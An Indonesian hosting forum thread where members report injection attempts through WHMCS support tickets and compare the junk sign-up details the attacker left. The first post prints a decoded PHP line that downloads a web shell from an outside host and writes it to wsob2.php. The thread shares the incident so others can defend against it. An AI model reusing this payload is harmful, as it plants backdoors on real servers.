Injeksi lewat SUPPORT TICKET WHMCS


Status
Not open for further replies.

capoengx

Beginner 2.0
saya juga dapet ginian, kalau di decode hasilnya..
$code = file_get_contents('http://blogger.com.sahabatcahaya.net/text/wsob2.php'); $fo = fopen("wsob2.php","w"); fwrite($fo,$code);

dia generate php shell dengan nama file wsob2.php ambil content dari http://blogger.com.sahabatcahaya.net/text/wsob2.php nah kalau di whois hosting dia ada di servernya iixcyberhost.com, jadi mungkin kalau disini ada orang iixcyberhost.com bisa bantu hapus file tersebut di atas agar tidak merugikan teman2 yg lain.. thanks.
 

GriyaHosting

Expert 1.0
Ini sengaja atau ndak ya, sudah daftar client, kirim ticket base64, tapi ninggalin no HP,
First Name asdasdh
Last Name jh
Company Name hkj
Email Address [email protected]
Address 1 lkklashdkj
Address 2 hkjh
City kjhkj
State/Region hkjhkjhkjh
Postcode 8127389
Country ID - Indonesia
Phone Number 628971238978

ScreenShot010.jpg
 

JOGLOMedia

Poster 2.0
masalah percobaan injeksi whmcs ini, sampai sekarang saya masih dapat, barusan dapat beberapa kali email iseng seperti itu :(
saya juga dapet ginian, kalau di decode hasilnya..


dia generate php shell dengan nama file wsob2.php ambil content dari hxxtp://blogger.com.sahabatcahaya.net/text/wsob2.php nah kalau di whois hosting dia ada di servernya iixcyberhost.com, jadi mungkin kalau disini ada orang iixcyberhost.com bisa bantu hapus file tersebut di atas agar tidak merugikan teman2 yg lain.. thanks.

kalau melihat dr polanya
hxxp://blogger.com.sahabatcahaya.net/text/wsob2.php
sepertinya itu injeksi yg dipakai buat script timthumb juga.
 
Status
Not open for further replies.

Top